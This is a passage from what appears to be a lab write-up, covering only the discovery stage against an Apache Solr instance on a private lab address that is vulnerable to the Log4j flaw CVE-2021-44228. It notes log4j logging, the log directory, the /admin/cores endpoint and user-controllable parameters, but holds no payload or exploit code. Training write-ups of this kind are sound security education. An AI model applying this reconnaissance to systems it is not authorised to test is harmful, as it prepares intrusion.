# Discovery

I explored the web interface accessible at **`http://10.10.75.171:8983`** and clicked around to get a feel for the application. For more detail on Apache Solr, please refer to their official website. <https://solr.apache.org/>

![http://10.10.75.171:8983](https://2022164620-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtzurpgroDJSMn9AFVmQP%2Fuploads%2Fzfn24dE0WTMG4UegrA57%2FDiscovery1.PNG?alt=media\&token=474496be-04f8-446f-a6a5-b6402fa01683)

This instance of Apache Solr is provisioned with no data whatsoever. It is a flat, vanilla, and absolutely minimum installation -- yet at its core it is still vulnerable to this CVE-2021-44228.

When navigating to [**`http://10.10.75.171:8983`**](http://10.10.75.171:8983/). I could see clear indicators that log4j is in use within the application for logging activity. **The `-Dsolr.log.dir` argument was set to,** /var/solr/logs

![solr logs](https://2022164620-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtzurpgroDJSMn9AFVmQP%2Fuploads%2FJeCZ0MbKyyLf3GGmVYsJ%2Fsolr%20logs.PNG?alt=media\&token=88fb9f0e-21e2-40de-b692-5eca39d9599f)

The path/ URL endpoint that is indicated in these repeat entries are - **/admin/cores**

I also gathered from these log entries that there are some datapoints I could control as a user. Params={} field gave that away.